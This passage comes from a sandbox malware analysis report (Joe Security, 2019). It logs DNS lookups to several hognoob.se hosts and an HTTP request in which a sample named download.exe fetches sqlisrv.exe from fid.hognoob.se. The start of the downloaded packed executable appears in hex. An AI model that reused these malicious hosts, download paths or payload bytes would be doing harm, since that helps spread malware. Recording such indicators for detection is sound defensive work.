May 16, 2019 17:17:24.638256073 CEST 53 65030 8.8.8.8 192.168.2.5
May 16, 2019 17:17:26.340679884 CEST 63505 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:26.354038954 CEST 53 63505 8.8.8.8 192.168.2.5
May 16, 2019 17:17:28.003288031 CEST 58579 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:28.016495943 CEST 53 58579 8.8.8.8 192.168.2.5
May 16, 2019 17:17:29.764863014 CEST 65402 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:29.792603016 CEST 53 65402 8.8.8.8 192.168.2.5
May 16, 2019 17:17:31.552505016 CEST 59046 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:31.565807104 CEST 53 59046 8.8.8.8 192.168.2.5
May 16, 2019 17:17:33.191221952 CEST 53154 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:33.221442938 CEST 53 53154 8.8.8.8 192.168.2.5
May 16, 2019 17:17:34.902124882 CEST 52283 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:34.915518999 CEST 53 52283 8.8.8.8 192.168.2.5
May 16, 2019 17:17:36.536287069 CEST 58992 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:36.564078093 CEST 53 58992 8.8.8.8 192.168.2.5
May 16, 2019 17:17:38.200508118 CEST 49985 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:38.228178024 CEST 53 49985 8.8.8.8 192.168.2.5
May 16, 2019 17:17:39.910947084 CEST 56529 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:39.924240112 CEST 53 56529 8.8.8.8 192.168.2.5
May 16, 2019 17:17:41.071813107 CEST 65334 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:41.518049955 CEST 53 65334 8.8.8.8 192.168.2.5
May 16, 2019 17:17:43.792778969 CEST 57365 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:43.828746080 CEST 53 57365 8.8.8.8 192.168.2.5
May 16, 2019 17:17:45.147485971 CEST 60056 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:45.178095102 CEST 53 60056 8.8.8.8 192.168.2.5
May 16, 2019 17:17:46.615647078 CEST 52221 53 192.168.2.5 8.8.8.8
May 16, 2019 17:17:46.642884970 CEST 53 52221 8.8.8.8 192.168.2.5
May 16, 2019 17:18:06.509629965 CEST 58454 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:06.555711985 CEST 53 58454 8.8.8.8 192.168.2.5
May 16, 2019 17:18:08.981101036 CEST 51879 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:08.994851112 CEST 53 51879 8.8.8.8 192.168.2.5
May 16, 2019 17:18:11.523444891 CEST 57390 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:11.550880909 CEST 53 57390 8.8.8.8 192.168.2.5
May 16, 2019 17:18:14.228220940 CEST 52974 53 192.168.2.5 8.8.8.8
May 16, 2019 17:18:14.258923054 CEST 53 52974 8.8.8.8 192.168.2.5
DNS Queries
Timestamp Source IP Dest IP Trans ID OP Code Name Type Class
May 16, 2019 17:15:39.070086956 CEST 192.168.2.5 8.8.8.8 0xebbe Standard query (0)
fid.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:39.144161940 CEST 192.168.2.5 8.8.8.8 0xe889 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:40.738154888 CEST 192.168.2.5 8.8.8.8 0x7de4 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:42.426970959 CEST 192.168.2.5 8.8.8.8 0xe1ee Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:44.085347891 CEST 192.168.2.5 8.8.8.8 0x792 Standard query (0)
fid.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:44.132404089 CEST 192.168.2.5 8.8.8.8 0xed86 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:45.823421955 CEST 192.168.2.5 8.8.8.8 0x3368 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:46.941581011 CEST 192.168.2.5 8.8.8.8 0x1922 Standard query (0)
fid.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:47.482274055 CEST 192.168.2.5 8.8.8.8 0x2a2 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:50.849494934 CEST 192.168.2.5 8.8.8.8 0x9832 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:52.489936113 CEST 192.168.2.5 8.8.8.8 0xc58f Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:53.103890896 CEST 192.168.2.5 8.8.8.8 0xfacb Standard query (0)
uio.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:53.375061035 CEST 192.168.2.5 8.8.8.8 0xbb7d Standard query (0)
upa1.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:53.576452971 CEST 192.168.2.5 8.8.8.8 0xbb56 Standard query (0)
upa2.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:54.214173079 CEST 192.168.2.5 8.8.8.8 0x6337 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:55.937410116 CEST 192.168.2.5 8.8.8.8 0x77e8 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:57.639635086 CEST 192.168.2.5 8.8.8.8 0x4ab3 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:15:59.347651005 CEST 192.168.2.5 8.8.8.8 0x6722 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:01.130189896 CEST 192.168.2.5 8.8.8.8 0x1e2 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:02.812659025 CEST 192.168.2.5 8.8.8.8 0xdfc6 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:04.547229052 CEST 192.168.2.5 8.8.8.8 0xacce Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:06.240150928 CEST 192.168.2.5 8.8.8.8 0x4b08 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:08.306943893 CEST 192.168.2.5 8.8.8.8 0xfd76 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:12.969938040 CEST 192.168.2.5 8.8.8.8 0xa3d4 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:14.651127100 CEST 192.168.2.5 8.8.8.8 0x320c Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:21.065387964 CEST 192.168.2.5 8.8.8.8 0x82d8 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:22.791235924 CEST 192.168.2.5 8.8.8.8 0xe8bb Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:24.500495911 CEST 192.168.2.5 8.8.8.8 0x9d13 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:26.195426941 CEST 192.168.2.5 8.8.8.8 0x4f04 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:31.800149918 CEST 192.168.2.5 8.8.8.8 0x546a Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:33.498259068 CEST 192.168.2.5 8.8.8.8 0x6249 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:35.433422089 CEST 192.168.2.5 8.8.8.8 0xdab1 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:37.098253012 CEST 192.168.2.5 8.8.8.8 0x4b17 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:38.811672926 CEST 192.168.2.5 8.8.8.8 0x3703 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:40.479717970 CEST 192.168.2.5 8.8.8.8 0x1e69 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:42.138859034 CEST 192.168.2.5 8.8.8.8 0x730c Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:43.855046988 CEST 192.168.2.5 8.8.8.8 0x76de Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:45.574423075 CEST 192.168.2.5 8.8.8.8 0xa505 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:47.304636002 CEST 192.168.2.5 8.8.8.8 0x370f Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:48.977777004 CEST 192.168.2.5 8.8.8.8 0x7e64 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:50.642930031 CEST 192.168.2.5 8.8.8.8 0x6237 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:54.067745924 CEST 192.168.2.5 8.8.8.8 0x4143 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:55.747817039 CEST 192.168.2.5 8.8.8.8 0x7ec4 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:16:57.391441107 CEST 192.168.2.5 8.8.8.8 0x8f53 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:01.390713930 CEST 192.168.2.5 8.8.8.8 0x9cc8 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:03.132452011 CEST 192.168.2.5 8.8.8.8 0xed52 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:04.779526949 CEST 192.168.2.5 8.8.8.8 0xaf13 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:06.519885063 CEST 192.168.2.5 8.8.8.8 0xbcc5 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:08.173060894 CEST 192.168.2.5 8.8.8.8 0xa24b Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:09.854626894 CEST 192.168.2.5 8.8.8.8 0x66b Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:11.532763004 CEST 192.168.2.5 8.8.8.8 0x38f9 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:13.209136009 CEST 192.168.2.5 8.8.8.8 0x8f5c Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:19.505327940 CEST 192.168.2.5 8.8.8.8 0x73df Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:21.178663969 CEST 192.168.2.5 8.8.8.8 0xa074 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:22.856798887 CEST 192.168.2.5 8.8.8.8 0xe699 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:24.610611916 CEST 192.168.2.5 8.8.8.8 0x7472 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:26.340679884 CEST 192.168.2.5 8.8.8.8 0xba0b Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:28.003288031 CEST 192.168.2.5 8.8.8.8 0x36a9 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:29.764863014 CEST 192.168.2.5 8.8.8.8 0xde13 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:31.552505016 CEST 192.168.2.5 8.8.8.8 0x7d16 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:33.191221952 CEST 192.168.2.5 8.8.8.8 0x6f23 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:34.902124882 CEST 192.168.2.5 8.8.8.8 0xcf8d Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:36.536287069 CEST 192.168.2.5 8.8.8.8 0x3497 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:38.200508118 CEST 192.168.2.5 8.8.8.8 0x4326 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:39.910947084 CEST 192.168.2.5 8.8.8.8 0xe5a7 Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:41.071813107 CEST 192.168.2.5 8.8.8.8 0xb48f Standard query (0)
2019.ip138.com A (IP address) IN (0x0001)
May 16, 2019 17:17:43.792778969 CEST 192.168.2.5 8.8.8.8 0xb46d Standard query (0)
pxx.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:45.147485971 CEST 192.168.2.5 8.8.8.8 0x4023 Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:17:46.615647078 CEST 192.168.2.5 8.8.8.8 0x2ca7 Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:06.509629965 CEST 192.168.2.5 8.8.8.8 0x6522 Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:08.981101036 CEST 192.168.2.5 8.8.8.8 0xddac Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:11.523444891 CEST 192.168.2.5 8.8.8.8 0xffac Standard query (0)
q1a.hognoob.se A (IP address) IN (0x0001)
May 16, 2019 17:18:14.228220940 CEST 192.168.2.5 8.8.8.8 0x612a Standard query (0)
haq.hognoob.se A (IP address) IN (0x0001)
DNS Answers
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
May 16, 2019 17:15:39.110205889 CEST 8.8.8.8 192.168.2.5 0xebbe No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)
May 16, 2019 17:15:39.171838999 CEST 8.8.8.8 192.168.2.5 0xe889 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:40.765496016 CEST 8.8.8.8 192.168.2.5 0x7de4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:42.460274935 CEST 8.8.8.8 192.168.2.5 0xe1ee No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:44.124200106 CEST 8.8.8.8 192.168.2.5 0x792 No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)
May 16, 2019 17:15:44.177515984 CEST 8.8.8.8 192.168.2.5 0xed86 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:45.850907087 CEST 8.8.8.8 192.168.2.5 0x3368 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:47.003392935 CEST 8.8.8.8 192.168.2.5 0x1922 No error (0) fid.hognoob.se 45.67.14.164 A (IP address) IN (0x0001)
May 16, 2019 17:15:47.510266066 CEST 8.8.8.8 192.168.2.5 0x2a2 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:50.876676083 CEST 8.8.8.8 192.168.2.5 0x9832 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:52.517611027 CEST 8.8.8.8 192.168.2.5 0xc58f No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:53.131223917 CEST 8.8.8.8 192.168.2.5 0xfacb No error (0) uio.hognoob.se 195.128.126.120 A (IP address) IN (0x0001)
May 16, 2019 17:15:53.403254986 CEST 8.8.8.8 192.168.2.5 0xbb7d No error (0) upa1.hognoob.se 172.104.161.101 A (IP address) IN (0x0001)
May 16, 2019 17:15:53.603751898 CEST 8.8.8.8 192.168.2.5 0xbb56 No error (0) upa2.hognoob.se 172.105.237.113 A (IP address) IN (0x0001)
May 16, 2019 17:15:54.274655104 CEST 8.8.8.8 192.168.2.5 0x6337 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:55.964837074 CEST 8.8.8.8 192.168.2.5 0x77e8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:57.666914940 CEST 8.8.8.8 192.168.2.5 0x4ab3 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:15:59.374690056 CEST 8.8.8.8 192.168.2.5 0x6722 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:01.157440901 CEST 8.8.8.8 192.168.2.5 0x1e2 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:02.839837074 CEST 8.8.8.8 192.168.2.5 0xdfc6 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:04.574561119 CEST 8.8.8.8 192.168.2.5 0xacce No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:06.274620056 CEST 8.8.8.8 192.168.2.5 0x4b08 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:08.335238934 CEST
8.8.8.8 192.168.2.5 0xfd76 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:13.009057045 CEST
8.8.8.8 192.168.2.5 0xa3d4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:14.664491892 CEST
8.8.8.8 192.168.2.5 0x320c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:21.092657089 CEST
8.8.8.8 192.168.2.5 0x82d8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
Copyright Joe Security LLC 2019 Page 44 of 69
May 16, 2019 17:16:22.818922043 CEST
8.8.8.8 192.168.2.5 0xe8bb No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:24.528129101 CEST
8.8.8.8 192.168.2.5 0x9d13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:26.223279953 CEST
8.8.8.8 192.168.2.5 0x4f04 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:31.827606916 CEST
8.8.8.8 192.168.2.5 0x546a No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:33.529900074 CEST
8.8.8.8 192.168.2.5 0x6249 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:35.461162090 CEST
8.8.8.8 192.168.2.5 0xdab1 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:37.125576019 CEST
8.8.8.8 192.168.2.5 0x4b17 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:38.825573921 CEST
8.8.8.8 192.168.2.5 0x3703 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:40.507721901 CEST
8.8.8.8 192.168.2.5 0x1e69 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:42.166168928 CEST
8.8.8.8 192.168.2.5 0x730c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:43.885386944 CEST
8.8.8.8 192.168.2.5 0x76de No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:45.601716042 CEST
8.8.8.8 192.168.2.5 0xa505 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:47.331859112 CEST
8.8.8.8 192.168.2.5 0x370f No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:48.991177082 CEST
8.8.8.8 192.168.2.5 0x7e64 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:50.674896002 CEST
8.8.8.8 192.168.2.5 0x6237 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:54.095082998 CEST
8.8.8.8 192.168.2.5 0x4143 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:55.761073112 CEST
8.8.8.8 192.168.2.5 0x7ec4 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:16:57.418710947 CEST
8.8.8.8 192.168.2.5 0x8f53 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:01.417872906 CEST
8.8.8.8 192.168.2.5 0x9cc8 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:03.145778894 CEST
8.8.8.8 192.168.2.5 0xed52 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:04.793451071 CEST
8.8.8.8 192.168.2.5 0xaf13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:06.533390999 CEST
8.8.8.8 192.168.2.5 0xbcc5 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:08.200413942 CEST
8.8.8.8 192.168.2.5 0xa24b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:09.887250900 CEST
8.8.8.8 192.168.2.5 0x66b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:11.546127081 CEST
8.8.8.8 192.168.2.5 0x38f9 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:13.222455025 CEST
8.8.8.8 192.168.2.5 0x8f5c No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
Copyright Joe Security LLC 2019 Page 45 of 69
May 16, 2019 17:17:19.532576084 CEST
8.8.8.8 192.168.2.5 0x73df No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:21.206109047 CEST
8.8.8.8 192.168.2.5 0xa074 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:22.870672941 CEST
8.8.8.8 192.168.2.5 0xe699 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:24.638256073 CEST
8.8.8.8 192.168.2.5 0x7472 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:26.354038954 CEST
8.8.8.8 192.168.2.5 0xba0b No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:28.016495943 CEST
8.8.8.8 192.168.2.5 0x36a9 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:29.792603016 CEST
8.8.8.8 192.168.2.5 0xde13 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:31.565807104 CEST
8.8.8.8 192.168.2.5 0x7d16 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:33.221442938 CEST
8.8.8.8 192.168.2.5 0x6f23 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:34.915518999 CEST
8.8.8.8 192.168.2.5 0xcf8d No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:36.564078093 CEST
8.8.8.8 192.168.2.5 0x3497 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:38.228178024 CEST
8.8.8.8 192.168.2.5 0x4326 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:39.924240112 CEST
8.8.8.8 192.168.2.5 0xe5a7 No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:41.518049955 CEST
8.8.8.8 192.168.2.5 0xb48f No error (0) 2019.ip138.com 117.25.157.119 A (IP address) IN (0x0001)
May 16, 2019 17:17:43.828746080 CEST
8.8.8.8 192.168.2.5 0xb46d No error (0) pxx.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:17:45.178095102 CEST
8.8.8.8 192.168.2.5 0x4023 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
May 16, 2019 17:17:46.642884970 CEST
8.8.8.8 192.168.2.5 0x2ca7 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
May 16, 2019 17:18:06.555711985 CEST
8.8.8.8 192.168.2.5 0x6522 No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
May 16, 2019 17:18:08.994851112 CEST
8.8.8.8 192.168.2.5 0xddac No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:18:11.550880909 CEST
8.8.8.8 192.168.2.5 0xffac No error (0) q1a.hognoob.se 23.106.122.2 A (IP address) IN (0x0001)
May 16, 2019 17:18:14.258923054 CEST
8.8.8.8 192.168.2.5 0x612a No error (0) haq.hognoob.se 195.128.124.140 A (IP address) IN (0x0001)
Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class
HTTP Request Dependency Graph
fid.hognoob.se
uio.hognoob.se:63145
HTTP Packets
Session ID Source IP Source Port Destination IP Destination Port Process
0 192.168.2.5 49797 45.67.14.164 80 C:\Users\user\Desktop\download.exe
Timestamp kBytes transferred Direction Data
May 16, 2019 17:15:39.184736013 CEST
0 OUT GET /sqlisrv.exe HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Host: fid.hognoob.seCache-Control: no-cache
May 16, 2019 17:15:39.233145952 CEST
2 IN HTTP/1.1 200 OKServer: nginxDate: Thu, 16 May 2019 15:15:39 GMTContent-Type: application/octet-streamContent-Length: 4672000Last-Modified: Tue, 14 May 2019 19:53:23 GMTConnection: keep-aliveETag: "5cdb1cb3-474a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3a b7 33 ae 7e d6 5d fd 7e d6 5d fd 7e d6 5d fd 05 ca 51 fd 7b d6 5d fd 11 c9 56 fd 77 d6 5d fd 11 c9 57 fd 78 d6 5d fd fd ca 53 fd 52 d6 5d fd 28 c9 4e fd 52 d6 5d fd fd de 00 fd 7c d6 5d fd 7e d6 5c fd d1 d4 5d fd 1c c9 4e fd 63 d6 5d fd 48 f0 57 fd b3 d6 5d fd 48 f0 56 fd 1e d6 5d fd 96 c9 56 fd 1a d6 5d fd 96 c9 57 fd 65 d6 5d fd 7e d6 5d fd 2a d6 5d fd b9 d0 5b fd 7f d6 5d fd 52 69 63 68 7e d6 5d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 81 13 db 5c 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 50 47 00 00 10 00 00 00 b0 18 00 f0 ff 5f 00 00 c0 18 00 00 10 60 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 60 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 60 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 30 00 00 00 00 00 b0 18 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 e0 55 50 58 31 00 00 00 00 00 50 47 00 00 c0 18 00 
